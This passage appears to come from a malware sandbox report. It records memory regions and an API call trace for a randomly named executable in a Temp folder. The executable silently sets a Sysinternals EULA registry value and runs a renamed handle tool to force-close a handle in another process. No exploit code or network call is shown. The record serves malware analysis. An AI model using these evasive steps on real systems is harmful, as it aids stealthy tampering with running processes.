"\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7870 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7871 start_va = 0x240000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 7872 start_va = 0x240000 end_va = 0x246fff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 7873 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 7874 start_va = 0x690000 end_va = 0x810fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 7875 start_va = 0x820000 end_va = 0x1c1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 7876 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 7877 start_va = 0x270000 end_va = 0x270fff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 7878 start_va = 0x1c20000 end_va = 0x1d7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c20000" filename = "" Thread: id = 898 os_tid = 0xf6c [0278.712] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffaf70d0000 [0278.712] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName=0x1400212e0) returned 0x7ffaf70f02a0 [0278.712] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FlsFree") returned 0x7ffaf70f23f0 [0278.712] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FlsGetValue") returned 0x7ffaf70e63c0 [0278.712] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FlsSetValue") returned 0x7ffaf70ed920 [0278.712] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffaf70f5620 [0278.712] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateEventExW") returned 0x7ffaf70f5580 [0278.713] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateSemaphoreExW") returned 0x7ffaf70f55e0 [0278.713] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetThreadStackGuarantee") returned 0x7ffaf70f0e10 [0278.713] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateThreadpoolTimer") returned 0x7ffaf70ef110 [0278.713] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetThreadpoolTimer") returned 0x7ffaf7a4cb10 [0278.713] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7ffaf7a55790 [0278.713] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CloseThreadpoolTimer") returned 0x7ffaf7a4ea10 [0278.713] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateThreadpoolWait") returned 0x7ffaf70f28c0 [0278.713] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetThreadpoolWait") returned 0x7ffaf7a4c470 [0278.713] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CloseThreadpoolWait") returned 0x7ffaf7a55410 [0278.713] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FlushProcessWriteBuffers") returned 0x7ffaf7aa42f0 [0278.713] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7ffaf7a895e0 [0278.713] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetCurrentProcessorNumber") returned 0x7ffaf7aa3130 [0278.713] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetLogicalProcessorInformation") returned 0x7ffaf70f0fb0 [0278.713] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateSymbolicLinkW") returned 0x7ffaf7112720 [0278.714] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetDefaultDllDirectories") returned 0x7ffaf4f0e7a0 [0278.714] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="EnumSystemLocalesEx") returned 0x7ffaf71128e0 [0278.714] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CompareStringEx") returned 0x7ffaf70e6010 [0278.714] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetDateFormatEx") returned 0x7ffaf7112a00 [0278.714] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetLocaleInfoEx") returned 0x7ffaf70f0310 [0278.714] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetTimeFormatEx") returned 0x7ffaf7112bc0 [0278.714] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetUserDefaultLocaleName") returned 0x7ffaf70f25d0 [0278.714] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="IsValidLocaleName") returned 0x7ffaf7112cd0 [0278.714] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="LCMapStringEx") returned 0x7ffaf70e6000 [0278.714] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetCurrentPackageId") returned 0x7ffaf4ea45e0 [0278.714] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetTickCount64") returned 0x7ffaf70e65a0 [0278.714] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0278.714] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0278.715] GetCurrentThreadId () returned 0xf6c [0278.715] GetStartupInfoW (in: lpStartupInfo=0x14fe90 | out: lpStartupInfo=0x14fe90*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x14000c2d0, hStdError=0x314560)) [0278.715] GetStdHandle (nStdHandle=0xfffffff6) returned 0x8 [0278.715] GetFileType (hFile=0x8) returned 0x2 [0278.715] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0278.715] GetFileType (hFile=0xc) returned 0x2 [0278.715] GetStdHandle (nStdHandle=0xfffffff4) returned 0x10 [0278.715] GetFileType (hFile=0x10) returned 0x2 [0278.715] GetCommandLineW () returned="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner" [0278.716] GetEnvironmentStringsW () returned 0x3154f0* [0278.716] FreeEnvironmentStringsW (penv=0x3154f0) returned 1 [0278.716] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14002c980, nSize=0x104 | out: lpFilename="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe")) returned 0x33 [0278.718] GetLastError () returned 0x0 [0278.718] SetLastError (dwErrCode=0x0) [0278.718] GetLastError () returned 0x0 [0278.718] SetLastError (dwErrCode=0x0) [0278.718] GetLastError () returned 0x0 [0278.718] SetLastError (dwErrCode=0x0) [0278.718] GetACP () returned 0x4e4 [0278.718] GetLastError () returned 0x0 [0278.718] SetLastError (dwErrCode=0x0) [0278.718] IsValidCodePage (CodePage=0x4e4) returned 1 [0278.718] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fe00 | out: lpCPInfo=0x14fe00) returned 1 [0278.718] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f8a0 | out: lpCPInfo=0x14f8a0) returned 1 [0278.718] GetLastError () returned 0x0 [0278.718] SetLastError (dwErrCode=0x0) [0278.718] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0278.718] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x14f5a0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ葹຅쒍") returned 256 [0278.718] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ葹຅쒍", cchSrc=256, lpCharType=0x14fbc0 | out: lpCharType=0x14fbc0) returned 1 [0278.718] GetLastError () returned 0x0 [0278.718] SetLastError (dwErrCode=0x0) [0278.719] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0278.719] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x14f590, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0278.719] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0278.719] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f380, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0278.719] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f9c0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0278.719] GetLastError () returned 0x0 [0278.719] SetLastError (dwErrCode=0x0) [0278.719] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0278.719] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x14f590, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0278.719] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0278.719] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f380, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0278.719] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14fac0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0278.719] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x140010890) returned 0x0 [0278.719] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffaf70d0000 [0278.719] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="IsWow64Process") returned 0x7ffaf70ee960 [0278.720] GetCurrentProcess () returned 0xffffffffffffffff [0278.720] IsWow64Process (in: hProcess=0xffffffffffffffff, Wow64Process=0x14fef0 | out: Wow64Process=0x14fef0) returned 1 [0278.720] GetLastError () returned 0x0 [0278.720] SetLastError (dwErrCode=0x0) [0278.720] GetLastError () returned 0x0 [0278.720] SetLastError (dwErrCode=0x0) [0278.720] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Sysinternals", ulOptions=0x0, samDesired=0x101, phkResult=0x14fc10 | out: phkResult=0x14fc10*=0x0) returned 0x2 [0278.720] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals", ulOptions=0x0, samDesired=0x101, phkResult=0x14fc10 | out: phkResult=0x14fc10*=0x14c) returned 0x0 [0278.720] RegQueryValueExW (in: hKey=0x14c, lpValueName="EulaAccepted", lpReserved=0x0, lpType=0x0, lpData=0x14fc40, lpcbData=0x14fc48*=0x4 | out: lpType=0x0, lpData=0x14fc40*=0x0, lpcbData=0x14fc48*=0x4) returned 0x2 [0278.720] RegCloseKey (hKey=0x14c) returned 0x0 [0278.720] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals\\Handle", ulOptions=0x0, samDesired=0x101, phkResult=0x14fc10 | out: phkResult=0x14fc10*=0x14c) returned 0x0 [0278.720] RegQueryValueExW (in: hKey=0x14c, lpValueName="EulaAccepted", lpReserved=0x0, lpType=0x0, lpData=0x14fc40, lpcbData=0x14fc48*=0x4 | out: lpType=0x0, lpData=0x14fc40*=0x1, lpcbData=0x14fc48*=0x4) returned 0x0 [0278.720] RegCloseKey (hKey=0x14c) returned 0x0 [0278.720] GetLastError () returned 0x0 [0278.720] SetLastError (dwErrCode=0x0) [0278.720] GetLastError () returned 0x0 [0278.720] SetLastError (dwErrCode=0x0) [0278.721] RegCreateKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals\\Handle", phkResult=0x14fc38 | out: phkResult=0x14fc38*=0x14c) returned 0x0 [0278.721] RegSetValueExW (in: hKey=0x14c, lpValueName="EulaAccepted", Reserved=0x0, dwType=0x4, lpData=0x14fc30*=0x1, cbData=0x4 | out: lpData=0x14fc30*=0x1) returned 0x0 [0278.721] RegCloseKey (hKey=0x14c) returned 0x0 [0278.721] GetLastError () returned 0x0 [0278.721] SetLastError (dwErrCode=0x0) [0278.722] GetLastError () returned 0x0 [0278.722] SetLastError (dwErrCode=0x0) [0278.722] GetLastError () returned 0x0 [0278.722] SetLastError (dwErrCode=0x0) [0278.722] GetLastError () returned 0x0 [0278.722] SetLastError (dwErrCode=0x0) [0278.722] GetLastError () returned 0x0 [0278.722] SetLastError (dwErrCode=0x0) [0278.722] GetLastError () returned 0x0 [0278.722] SetLastError (dwErrCode=0x0) [0278.722] GetLastError () returned 0x0 [0278.722] SetLastError (dwErrCode=0x0) [0278.722] GetLastError () returned 0x0 [0278.722] SetLastError (dwErrCode=0x0) [0278.722] GetLastError () returned 0x0 [0278.722] SetLastError (dwErrCode=0x0) [0278.722] GetLastError () returned 0x0 [0278.722] SetLastError (dwErrCode=0x0) [0278.722] GetLastError () returned 0x0 [0278.722] SetLastError (dwErrCode=0x0) [0278.722] GetLastError () returned 0x0 [0278.722] SetLastError (dwErrCode=0x0) [0278.722] GetLastError () returned 0x0 [0278.722] SetLastError (dwErrCode=0x0) [0278.722] GetLastError () returned 0x0 [0278.722] SetLastError (dwErrCode=0x0) [0278.722] GetLastError () returned 0x0 [0278.722] SetLastError (dwErrCode=0x0) [0278.722] GetLastError () returned 0x0 [0278.722] SetLastError (dwErrCode=0x0) [0278.722] GetLastError () returned 0x0 [0278.722] SetLastError (dwErrCode=0x0) [0278.722] GetLastError () returned 0x0 [0278.722] SetLastError (dwErrCode=0x0) [0278.722] GetLastError () returned 0x0 [0278.722] SetLastError (dwErrCode=0x0) [0278.722] GetLastError () returned 0x0 [0278.722] SetLastError (dwErrCode=0x0) [0278.723] GetLastError () returned 0x0 [0278.723] SetLastError (dwErrCode=0x0) [0278.723] GetLastError () returned 0x0 [0278.723] SetLastError (dwErrCode=0x0) [0278.723] GetLastError () returned 0x0 [0278.723] SetLastError (dwErrCode=0x0) [0278.723] GetLastError () returned 0x0 [0278.723] SetLastError (dwErrCode=0x0) [0278.723] GetLastError () returned 0x0 [0278.723] SetLastError (dwErrCode=0x0) [0278.723] GetLastError () returned 0x0 [0278.723] SetLastError (dwErrCode=0x0) [0278.723] GetLastError () returned 0x0 [0278.723] SetLastError (dwErrCode=0x0) [0278.723] GetLastError () returned 0x0 [0278.723] SetLastError (dwErrCode=0x0) [0278.723] GetLastError () returned 0x0 [0278.723] SetLastError (dwErrCode=0x0) [0278.723] GetLastError () returned 0x0 [0278.723] SetLastError (dwErrCode=0x0) [0278.723] GetLastError () returned 0x0 [0278.723] SetLastError (dwErrCode=0x0) [0278.723] GetLastError () returned 0x0 [0278.723] SetLastError (dwErrCode=0x0) [0278.723] GetLastError () returned 0x0 [0278.723] SetLastError (dwErrCode=0x0) [0278.723] GetLastError () returned 0x0 [0278.723] SetLastError (dwErrCode=0x0) [0278.723] GetLastError () returned 0x0 [0278.723] SetLastError (dwErrCode=0x0) [0278.723] GetLastError () returned 0x0 [0278.723] SetLastError (dwErrCode=0x0) [0278.723] GetLastError () returned 0x0 [0278.723] SetLastError (dwErrCode=0x0) [0278.723] GetLastError () returned 0x0 [0278.723] SetLastError (dwErrCode=0x0) [0278.723] GetLastError () returned 0x0 [0278.723] SetLastError (dwErrCode=0x0) [0278.723] 